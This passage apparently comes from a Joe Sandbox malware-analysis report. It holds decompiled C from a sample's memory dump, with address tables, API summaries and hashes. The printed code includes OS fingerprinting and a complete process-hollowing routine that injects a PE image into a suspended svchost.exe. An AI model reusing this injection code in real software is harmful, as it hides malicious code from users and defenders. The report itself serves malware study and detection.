                                                                                                                                                                                                                                                                          0x040056b2
                                                                                                                                                                                                                                                                          0x040056b2
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x040056a2
                                                                                                                                                                                                                                                                          0x0400545e
                                                                                                                                                                                                                                                                          0x04005477
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x0400548b
                                                                                                                                                                                                                                                                          0x04005491
                                                                                                                                                                                                                                                                          0x0400549b
                                                                                                                                                                                                                                                                          0x040054a5
                                                                                                                                                                                                                                                                          0x040054c0
                                                                                                                                                                                                                                                                          0x040054f5
                                                                                                                                                                                                                                                                          0x040054fa
                                                                                                                                                                                                                                                                          0x040054fd
                                                                                                                                                                                                                                                                          0x0400550d
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x0400551d
                                                                                                                                                                                                                                                                          0x040054ba
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x040054ba
                                                                                                                                                                                                                                                                          0x0400550d
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x0400551f
                                                                                                                                                                                                                                                                          0x0400551f
                                                                                                                                                                                                                                                                          0x04005526
                                                                                                                                                                                                                                                                          0x04005533
                                                                                                                                                                                                                                                                          0x04005540
                                                                                                                                                                                                                                                                          0x04005598
                                                                                                                                                                                                                                                                          0x040055ae
                                                                                                                                                                                                                                                                          0x040055b4
                                                                                                                                                                                                                                                                          0x040055c1
                                                                                                                                                                                                                                                                          0x040055d8
                                                                                                                                                                                                                                                                          0x04005631
                                                                                                                                                                                                                                                                          0x04005654
                                                                                                                                                                                                                                                                          0x04005659
                                                                                                                                                                                                                                                                          0x040055da
                                                                                                                                                                                                                                                                          0x040055ef
                                                                                                                                                                                                                                                                          0x04005612
                                                                                                                                                                                                                                                                          0x04005617
                                                                                                                                                                                                                                                                          0x04005617
                                                                                                                                                                                                                                                                          0x0400566b
                                                                                                                                                                                                                                                                          0x0400567c
                                                                                                                                                                                                                                                                          0x0400568b
                                                                                                                                                                                                                                                                          0x0400568b
                                                                                                                                                                                                                                                                          0x04005542
                                                                                                                                                                                                                                                                          0x04005552
                                                                                                                                                                                                                                                                          0x0400555b
                                                                                                                                                                                                                                                                          0x04005573
                                                                                                                                                                                                                                                                          0x04005578
                                                                                                                                                                                                                                                                          0x04005584
                                                                                                                                                                                                                                                                          0x04005584
                                                                                                                                                                                                                                                                          0x04005695
                                                                                                                                                                                                                                                                          0x04005695
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04005526
                                                                                                                                                                                                                                                                          0x0400545e
                                                                                                                                                                                                                                                                          0x0400534e
                                                                                                                                                                                                                                                                          0x04004c84
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04004bf9

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • CoInitialize.OLE32(00000000), ref: 04004BAC
                                                                                                                                                                                                                                                                          • SetEvent.KERNEL32(?), ref: 04004BDB
                                                                                                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(0000EA60,0000000A), ref: 04004C19
                                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00100000,00003000,00000004), ref: 04004C49
                                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00100000,00003000,00000004), ref: 04004C60
                                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00100000,00003000,00000004), ref: 04004C77
                                                                                                                                                                                                                                                                          • CoUninitialize.OLE32 ref: 040056F0
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.599743411.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.599611327.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.600083870.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.600248652.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_4000000_iJzpyjAehB.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: AllocVirtual$EventInitializeObjectSingleUninitializeWait
                                                                                                                                                                                                                                                                          • String ID: $`$pigalicapi
                                                                                                                                                                                                                                                                          • API String ID: 1834614700-42206024
                                                                                                                                                                                                                                                                          • Opcode ID: 0b588b8632747e3a4410319c3fb32f93fea484f2e03b927fbc22a93c38a5764c
                                                                                                                                                                                                                                                                          • Instruction ID: f4bd0befb8abd7887e3d73177c72bf7f141d25b4899fa760b57ca1a426edb567
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0b588b8632747e3a4410319c3fb32f93fea484f2e03b927fbc22a93c38a5764c
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 39628DB1D00218ABFB14DBA0DC84FEDB7B9AF49309F04C559E6057B281E775AA84CF61
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                          control_flow_graph 342 4008f80-4008f94 343 4008f9a-4008f9e 342->343 344 400927b-4009281 342->344 343->344 345 4008fa4-4008fa8 343->345 345->344 346 4008fae-4008fff call 4007d20 * 3 GetVersionExA 345->346 353 4009005-4009016 GetSystemInfo 346->353 354 4009266-400926a 346->354 355 4009115-400911c 353->355 356 400901c-4009023 353->356 354->344 357 400926c-4009275 lstrcatA 354->357 358 4009210-4009217 call 4009290 355->358 359 4009122-4009129 355->359 360 4009042-4009049 356->360 361 4009025-400903d lstrcatA 356->361 357->344 376 4009228-4009237 lstrlenA 358->376 377 4009219-4009222 lstrcatA 358->377 362 4009174-400917b 359->362 363 400912b-4009132 359->363 366 4009068-400906f 360->366 367 400904b-4009063 lstrcatA 360->367 365 4009110 361->365 372 40091c3-40091ca 362->372 373 400917d-4009184 362->373 368 4009134-400914c lstrcatA 363->368 369 400914e-4009155 363->369 365->358 366->365 371 4009075-400907c 366->371 367->365 374 400916f 368->374 369->374 375 4009157-4009169 lstrcatA 369->375 378 40090a1-40090ab GetSystemMetrics 371->378 379 400907e-4009085 371->379 372->358 382 40091cc-40091d3 372->382 380 40091a0-40091a7 373->380 381 4009186-400919e lstrcatA 373->381 374->358 375->374 383 4009259-4009263 lstrlenA 376->383 384 4009239-4009253 lstrcatA * 2 376->384 377->376 386 40090c7-40090d1 GetSystemMetrics 378->386 387 40090ad-40090c5 lstrcatA 378->387 379->378 385 4009087-400909f lstrcatA 379->385 388 40091c1 380->388 389 40091a9-40091bb lstrcatA 380->389 381->388 390 40091d5-40091ed lstrcatA 382->390 391 40091ef-40091f6 382->391 383->354 384->383 385->365 393 40090d3-40090eb lstrcatA 386->393 394 40090ed-40090f6 386->394 387->365 388->358 389->388 390->358 391->358 392 40091f8-400920a lstrcatA 391->392 392->358 393->365 394->365 395 40090f8-400910a lstrcatA 394->395 395->365
                                                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                                                          			E04008F80(CHAR* _a4, intOrPtr _a8, intOrPtr* _a12) {
                                                                                                                                                                                                                                                                          				int _v8;
                                                                                                                                                                                                                                                                          				struct _SYSTEM_INFO _v44;
                                                                                                                                                                                                                                                                          				signed int _v50;
                                                                                                                                                                                                                                                                          				signed short _v52;
                                                                                                                                                                                                                                                                          				struct _OSVERSIONINFOA _v204;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                                                                                          				if(_a4 == 0 || _a8 == 0 || _a12 == 0) {
                                                                                                                                                                                                                                                                          					L45:
                                                                                                                                                                                                                                                                          					return _v8;
                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                          					E04007D20(E04007D20(_a8, _a4, 0, _a8),  &_v204, 0, 0x9c);
                                                                                                                                                                                                                                                                          					_v204.dwOSVersionInfoSize = 0x9c;
                                                                                                                                                                                                                                                                          					E04007D20( &_v44,  &_v44, 0, 0x24);
                                                                                                                                                                                                                                                                          					if(GetVersionExA( &_v204) == 0) {
                                                                                                                                                                                                                                                                          						L43:
                                                                                                                                                                                                                                                                          						if(_v8 == 0) {
                                                                                                                                                                                                                                                                          							lstrcatA(_a4, "UndefinedOS");
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						goto L45;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					GetSystemInfo( &_v44); // executed
                                                                                                                                                                                                                                                                          					if(_v204.dwMajorVersion != 5) {
                                                                                                                                                                                                                                                                          						if(_v204.dwMajorVersion == 6) {
                                                                                                                                                                                                                                                                          							if(_v204.dwMinorVersion != 0) {
                                                                                                                                                                                                                                                                          								if(_v204.dwMinorVersion != 1) {
                                                                                                                                                                                                                                                                          									if(_v204.dwMinorVersion == 2) {
                                                                                                                                                                                                                                                                          										if((_v50 & 0x000000ff) == 1) {
                                                                                                                                                                                                                                                                          											if((_v50 & 0x000000ff) == 1) {
                                                                                                                                                                                                                                                                          												lstrcatA(_a4, "Win8");
                                                                                                                                                                                                                                                                          												 *_a12 = 0xb;
                                                                                                                                                                                                                                                                          											}
                                                                                                                                                                                                                                                                          										} else {
                                                                                                                                                                                                                                                                          											lstrcatA(_a4, "WinServer2012");
                                                                                                                                                                                                                                                                          											 *_a12 = 0xc;
                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                                                          									if((_v50 & 0x000000ff) == 1) {
                                                                                                                                                                                                                                                                          										if((_v50 & 0x000000ff) == 1) {
                                                                                                                                                                                                                                                                          											lstrcatA(_a4, "Win7");
                                                                                                                                                                                                                                                                          											 *_a12 = 8;
                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                          									} else {
                                                                                                                                                                                                                                                                          										lstrcatA(_a4, "WinServer2008R2");
                                                                                                                                                                                                                                                                          										 *_a12 = 0xa;
                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                                                          								if((_v50 & 0x000000ff) != 1) {
                                                                                                                                                                                                                                                                          									if((_v50 & 0x000000ff) != 1) {
                                                                                                                                                                                                                                                                          										lstrcatA(_a4, "WinServer2008");
                                                                                                                                                                                                                                                                          										 *_a12 = 9;
                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                                                          									lstrcatA(_a4, "Vista");
                                                                                                                                                                                                                                                                          									 *_a12 = 7;
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						L38:
                                                                                                                                                                                                                                                                          						if(E04009290() != 0) {
                                                                                                                                                                                                                                                                          							lstrcatA(_a4, "_x64");
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						if(lstrlenA( &(_v204.szCSDVersion)) != 0) {
                                                                                                                                                                                                                                                                          							lstrcatA(_a4, "_");
                                                                                                                                                                                                                                                                          							lstrcatA(_a4,  &(_v204.szCSDVersion));
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						_v8 = lstrlenA(_a4);
                                                                                                                                                                                                                                                                          						goto L43;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					if(_v204.dwMinorVersion != 0) {
                                                                                                                                                                                                                                                                          						if(_v204.dwMinorVersion != 1) {
                                                                                                                                                                                                                                                                          							if(_v204.dwMinorVersion == 2) {
                                                                                                                                                                                                                                                                          								if((_v50 & 0x000000ff) != 1 || (_v44.dwOemId & 0x0000ffff) != 9) {
                                                                                                                                                                                                                                                                          									if(GetSystemMetrics(0x59) != 0) {
                                                                                                                                                                                                                                                                          										if(GetSystemMetrics(0x59) == 0) {
                                                                                                                                                                                                                                                                          											if((_v52 & 0x8000) != 0) {
                                                                                                                                                                                                                                                                          												lstrcatA(_a4, "WinHomeServer");
                                                                                                                                                                                                                                                                          												 *_a12 = 4;
                                                                                                                                                                                                                                                                          											}
                                                                                                                                                                                                                                                                          										} else {
                                                                                                                                                                                                                                                                          											lstrcatA(_a4, "WinServer2003R2");
                                                                                                                                                                                                                                                                          											 *_a12 = 6;
                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                          									} else {
                                                                                                                                                                                                                                                                          										lstrcatA(_a4, "WinServer2003");
                                                                                                                                                                                                                                                                          										 *_a12 = 5;
                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                                                          									lstrcatA(_a4, "WinXP64");
                                                                                                                                                                                                                                                                          									 *_a12 = 3;
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                          							lstrcatA(_a4, "WinXP");
                                                                                                                                                                                                                                                                          							 *_a12 = 2;
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                          						lstrcatA(_a4, "Win2K");
                                                                                                                                                                                                                                                                          						 *_a12 = 1;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					goto L38;
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          			}








                                                                                                                                                                                                                                                                          0x04008f89
                                                                                                                                                                                                                                                                          0x04008f94
                                                                                                                                                                                                                                                                          0x0400927b
                                                                                                                                                                                                                                                                          0x04009281
                                                                                                                                                                                                                                                                          0x04008fae
                                                                                                                                                                                                                                                                          0x04008fce
                                                                                                                                                                                                                                                                          0x04008fd6
                                                                                                                                                                                                                                                                          0x04008fe8
                                                                                                                                                                                                                                                                          0x04008fff
                                                                                                                                                                                                                                                                          0x04009266
                                                                                                                                                                                                                                                                          0x0400926a
                                                                                                                                                                                                                                                                          0x04009275
                                                                                                                                                                                                                                                                          0x04009275
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x0400926a
                                                                                                                                                                                                                                                                          0x04009009
                                                                                                                                                                                                                                                                          0x04009016
                                                                                                                                                                                                                                                                          0x0400911c
                                                                                                                                                                                                                                                                          0x04009129
                                                                                                                                                                                                                                                                          0x0400917b
                                                                                                                                                                                                                                                                          0x040091ca
                                                                                                                                                                                                                                                                          0x040091d3
                                                                                                                                                                                                                                                                          0x040091f6
                                                                                                                                                                                                                                                                          0x04009201
                                                                                                                                                                                                                                                                          0x0400920a
                                                                                                                                                                                                                                                                          0x0400920a
                                                                                                                                                                                                                                                                          0x040091d5
                                                                                                                                                                                                                                                                          0x040091de
                                                                                                                                                                                                                                                                          0x040091e7
                                                                                                                                                                                                                                                                          0x040091e7
                                                                                                                                                                                                                                                                          0x040091d3
                                                                                                                                                                                                                                                                          0x0400917d
                                                                                                                                                                                                                                                                          0x04009184
                                                                                                                                                                                                                                                                          0x040091a7
                                                                                                                                                                                                                                                                          0x040091b2
                                                                                                                                                                                                                                                                          0x040091bb
                                                                                                                                                                                                                                                                          0x040091bb
                                                                                                                                                                                                                                                                          0x04009186
                                                                                                                                                                                                                                                                          0x0400918f
                                                                                                                                                                                                                                                                          0x04009198
                                                                                                                                                                                                                                                                          0x04009198
                                                                                                                                                                                                                                                                          0x040091c1
                                                                                                                                                                                                                                                                          0x0400912b
                                                                                                                                                                                                                                                                          0x04009132
                                                                                                                                                                                                                                                                          0x04009155
                                                                                                                                                                                                                                                                          0x04009160
                                                                                                                                                                                                                                                                          0x04009169
                                                                                                                                                                                                                                                                          0x04009169
                                                                                                                                                                                                                                                                          0x04009134
                                                                                                                                                                                                                                                                          0x0400913d
                                                                                                                                                                                                                                                                          0x04009146
                                                                                                                                                                                                                                                                          0x04009146
                                                                                                                                                                                                                                                                          0x0400916f
                                                                                                                                                                                                                                                                          0x04009129
                                                                                                                                                                                                                                                                          0x04009210
                                                                                                                                                                                                                                                                          0x04009217
                                                                                                                                                                                                                                                                          0x04009222
                                                                                                                                                                                                                                                                          0x04009222
                                                                                                                                                                                                                                                                          0x04009237
                                                                                                                                                                                                                                                                          0x04009242
                                                                                                                                                                                                                                                                          0x04009253
                                                                                                                                                                                                                                                                          0x04009253
                                                                                                                                                                                                                                                                          0x04009263
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04009263
                                                                                                                                                                                                                                                                          0x04009023
                                                                                                                                                                                                                                                                          0x04009049
                                                                                                                                                                                                                                                                          0x0400906f
                                                                                                                                                                                                                                                                          0x0400907c
                                                                                                                                                                                                                                                                          0x040090ab
                                                                                                                                                                                                                                                                          0x040090d1
                                                                                                                                                                                                                                                                          0x040090f6
                                                                                                                                                                                                                                                                          0x04009101
                                                                                                                                                                                                                                                                          0x0400910a
                                                                                                                                                                                                                                                                          0x0400910a
                                                                                                                                                                                                                                                                          0x040090d3
                                                                                                                                                                                                                                                                          0x040090dc
                                                                                                                                                                                                                                                                          0x040090e5
                                                                                                                                                                                                                                                                          0x040090e5
                                                                                                                                                                                                                                                                          0x040090ad
                                                                                                                                                                                                                                                                          0x040090b6
                                                                                                                                                                                                                                                                          0x040090bf
                                                                                                                                                                                                                                                                          0x040090bf
                                                                                                                                                                                                                                                                          0x04009087
                                                                                                                                                                                                                                                                          0x04009090
                                                                                                                                                                                                                                                                          0x04009099
                                                                                                                                                                                                                                                                          0x04009099
                                                                                                                                                                                                                                                                          0x0400907c
                                                                                                                                                                                                                                                                          0x0400904b
                                                                                                                                                                                                                                                                          0x04009054
                                                                                                                                                                                                                                                                          0x0400905d
                                                                                                                                                                                                                                                                          0x0400905d
                                                                                                                                                                                                                                                                          0x04009025
                                                                                                                                                                                                                                                                          0x0400902e
                                                                                                                                                                                                                                                                          0x04009037
                                                                                                                                                                                                                                                                          0x04009037
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04009110

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetVersionExA.KERNEL32(0000009C), ref: 04008FF7
                                                                                                                                                                                                                                                                          • GetSystemInfo.KERNEL32(?), ref: 04009009
                                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,Win2K), ref: 0400902E
                                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,WinXP), ref: 04009054
                                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,Vista), ref: 0400913D
                                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,WinServer2008), ref: 04009160
                                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,WinServer2008R2), ref: 0400918F
                                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,Win7), ref: 040091B2
                                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,WinServer2012), ref: 040091DE
                                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,Win8), ref: 04009201
                                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,_x64), ref: 04009222
                                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(?), ref: 0400922F
                                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,0400C980), ref: 04009242
                                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,?), ref: 04009253
                                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(00000000), ref: 0400925D
                                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,UndefinedOS), ref: 04009275
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.599743411.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.599611327.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.600083870.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.600248652.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_4000000_iJzpyjAehB.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: lstrcat$lstrlen$InfoSystemVersion
                                                                                                                                                                                                                                                                          • String ID: UndefinedOS$Vista$Win2K$Win7$Win8$WinHomeServer$WinServer2003$WinServer2003R2$WinServer2008$WinServer2008R2$WinServer2012$WinXP$WinXP64$_x64
                                                                                                                                                                                                                                                                          • API String ID: 3139318632-332591429
                                                                                                                                                                                                                                                                          • Opcode ID: b80c610fb93e26c1f6b8a0e3d57eccb9ead3b078b5df3064abf97d281ea2cf4c
                                                                                                                                                                                                                                                                          • Instruction ID: 2fdea20511d00b83c143a5217ffb9651c4d2114897e9ccdf2931e29d93762e72
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b80c610fb93e26c1f6b8a0e3d57eccb9ead3b078b5df3064abf97d281ea2cf4c
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1A81F9B4644209EBFB249F60C849BAE7BB5FB49301F00C659F905BA2C1D779E9C1CB61
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                                                          			E040020B0(intOrPtr _a4, signed char _a8, CHAR* _a12) {
                                                                                                                                                                                                                                                                          				long _v8;
                                                                                                                                                                                                                                                                          				void* _v12;
                                                                                                                                                                                                                                                                          				char _v276;
                                                                                                                                                                                                                                                                          				struct _CONTEXT _v996;
                                                                                                                                                                                                                                                                          				struct _PROCESS_INFORMATION _v1012;
                                                                                                                                                                                                                                                                          				intOrPtr _v1016;
                                                                                                                                                                                                                                                                          				struct _STARTUPINFOA _v1092;
                                                                                                                                                                                                                                                                          				intOrPtr _v1096;
                                                                                                                                                                                                                                                                          				void _v1100;
                                                                                                                                                                                                                                                                          				signed int _v1104;
                                                                                                                                                                                                                                                                          				CHAR* _t121;
                                                                                                                                                                                                                                                                          				void* _t128;
                                                                                                                                                                                                                                                                          				int _t130;
                                                                                                                                                                                                                                                                          				void* _t132;
                                                                                                                                                                                                                                                                          				int _t140;
                                                                                                                                                                                                                                                                          				int _t143;
                                                                                                                                                                                                                                                                          				int _t145;
                                                                                                                                                                                                                                                                          				int _t148;
                                                                                                                                                                                                                                                                          				void* _t263;
                                                                                                                                                                                                                                                                          				void* _t265;
                                                                                                                                                                                                                                                                          				void* _t266;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				if(_a4 == 0) {
                                                                                                                                                                                                                                                                          					L26:
                                                                                                                                                                                                                                                                          					return 0;
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				GetEnvironmentVariableA("SystemRoot",  &_v276, 0x104);
                                                                                                                                                                                                                                                                          				_t121 = lstrcatA( &_v276, "\\system32\\svchost.exe");
                                                                                                                                                                                                                                                                          				if(_a12 != 0) {
                                                                                                                                                                                                                                                                          					lstrcatA( &_v276, " ");
                                                                                                                                                                                                                                                                          					_t121 = lstrcatA( &_v276, _a12);
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				E04007D20(_t121,  &_v1012, 0, 0x10);
                                                                                                                                                                                                                                                                          				E04007D20( &_v1092,  &_v1092, 0, 0x44);
                                                                                                                                                                                                                                                                          				_t265 = _t263 + 0x18;
                                                                                                                                                                                                                                                                          				_v1092.cb = 0x44;
                                                                                                                                                                                                                                                                          				_v1096 = _a4 +  *((intOrPtr*)(_a4 + 0x3c));
                                                                                                                                                                                                                                                                          				_v1016 = _v1096 + ( *(_v1096 + 0x14) & 0x0000ffff) + 0x18;
                                                                                                                                                                                                                                                                          				_v8 =  *((intOrPtr*)(_v1096 + 0x50));
                                                                                                                                                                                                                                                                          				_t128 = VirtualAlloc(0, _v8, 0x3000, 0x40); // executed
                                                                                                                                                                                                                                                                          				_v12 = _t128;
                                                                                                                                                                                                                                                                          				if(_v12 != 0) {
                                                                                                                                                                                                                                                                          					_t130 = CreateProcessA(0,  &_v276, 0, 0, 0, 4, 0, 0,  &_v1092,  &_v1012); // executed
                                                                                                                                                                                                                                                                          					if(_t130 != 0) {
                                                                                                                                                                                                                                                                          						_t132 = VirtualAllocEx(_v1012.hProcess,  *(_v1096 + 0x34), _v8, 0x3000, 0x40); // executed
                                                                                                                                                                                                                                                                          						_v1100 = _t132;
                                                                                                                                                                                                                                                                          						if(_v1100 != 0) {
                                                                                                                                                                                                                                                                          							L10:
                                                                                                                                                                                                                                                                          							E04007B70(_v12, _a4,  *((intOrPtr*)(_v1096 + 0x54)));
                                                                                                                                                                                                                                                                          							_t266 = _t265 + 0xc;
                                                                                                                                                                                                                                                                          							_v1104 = 0;
                                                                                                                                                                                                                                                                          							while(_v1104 < ( *(_v1096 + 6) & 0x0000ffff)) {
                                                                                                                                                                                                                                                                          								if((_a8 & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                          									E04007B70(_v12 +  *((intOrPtr*)(_v1016 + 0xc + _v1104 * 0x28)), _a4 +  *((intOrPtr*)(_v1016 + 0xc + _v1104 * 0x28)),  *((intOrPtr*)(_v1016 + 0x10 + _v1104 * 0x28)));
                                                                                                                                                                                                                                                                          									_t266 = _t266 + 0xc;
                                                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                                                          									E04007B70(_v12 +  *((intOrPtr*)(_v1016 + 0xc + _v1104 * 0x28)), _a4 +  *((intOrPtr*)(_v1016 + 0x14 + _v1104 * 0x28)),  *((intOrPtr*)(_v1016 + 0x10 + _v1104 * 0x28)));
                                                                                                                                                                                                                                                                          									_t266 = _t266 + 0xc;
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          								_v1104 = _v1104 + 1;
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          							E040026D0(_v12, _v1100);
                                                                                                                                                                                                                                                                          							_t140 = WriteProcessMemory(_v1012.hProcess, _v1100, _v12, _v8, 0); // executed
                                                                                                                                                                                                                                                                          							if(_t140 != 0) {
                                                                                                                                                                                                                                                                          								VirtualFree(_v12, 0, 0x8000); // executed
                                                                                                                                                                                                                                                                          								_v996.ContextFlags = 0x10007;
                                                                                                                                                                                                                                                                          								_t143 = GetThreadContext(_v1012.hThread,  &_v996); // executed
                                                                                                                                                                                                                                                                          								if(_t143 != 0) {
                                                                                                                                                                                                                                                                          									_t145 = WriteProcessMemory(_v1012.hProcess, _v996.Ebx + 8,  &_v1100, 4, 0); // executed
                                                                                                                                                                                                                                                                          									if(_t145 != 0) {
                                                                                                                                                                                                                                                                          										_v996.Eax = _v1100 +  *((intOrPtr*)(_v1096 + 0x28));
                                                                                                                                                                                                                                                                          										_t148 = SetThreadContext(_v1012.hThread,  &_v996); // executed
                                                                                                                                                                                                                                                                          										if(_t148 == 0) {
                                                                                                                                                                                                                                                                          											TerminateProcess(_v1012.hProcess, 0);
                                                                                                                                                                                                                                                                          											CloseHandle(_v1012.hThread);
                                                                                                                                                                                                                                                                          											CloseHandle(_v1012.hProcess);
                                                                                                                                                                                                                                                                          											goto L26;
                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                          										ResumeThread(_v1012.hThread); // executed
                                                                                                                                                                                                                                                                          										return _v1012.hProcess;
                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                          									TerminateProcess(_v1012.hProcess, 0);
                                                                                                                                                                                                                                                                          									CloseHandle(_v1012.hProcess);
                                                                                                                                                                                                                                                                          									CloseHandle(_v1012.hThread);
                                                                                                                                                                                                                                                                          									return 0;
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          								TerminateProcess(_v1012.hProcess, 0);
                                                                                                                                                                                                                                                                          								CloseHandle(_v1012.hProcess);
                                                                                                                                                                                                                                                                          								CloseHandle(_v1012.hThread);
                                                                                                                                                                                                                                                                          								return 0;
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          							TerminateProcess(_v1012.hProcess, 0);
                                                                                                                                                                                                                                                                          							CloseHandle(_v1012.hProcess);
                                                                                                                                                                                                                                                                          							CloseHandle(_v1012.hThread);
                                                                                                                                                                                                                                                                          							VirtualFree(_v12, 0, 0x8000);
                                                                                                                                                                                                                                                                          							return 0;
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						_v1100 = VirtualAllocEx(_v1012.hProcess, 0, _v8, 0x103000, 0x40);
                                                                                                                                                                                                                                                                          						if(_v1100 != 0) {
                                                                                                                                                                                                                                                                          							goto L10;
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						TerminateProcess(_v1012.hProcess, 0);
                                                                                                                                                                                                                                                                          						CloseHandle(_v1012);
                                                                                                                                                                                                                                                                          						CloseHandle(_v1012.hThread);
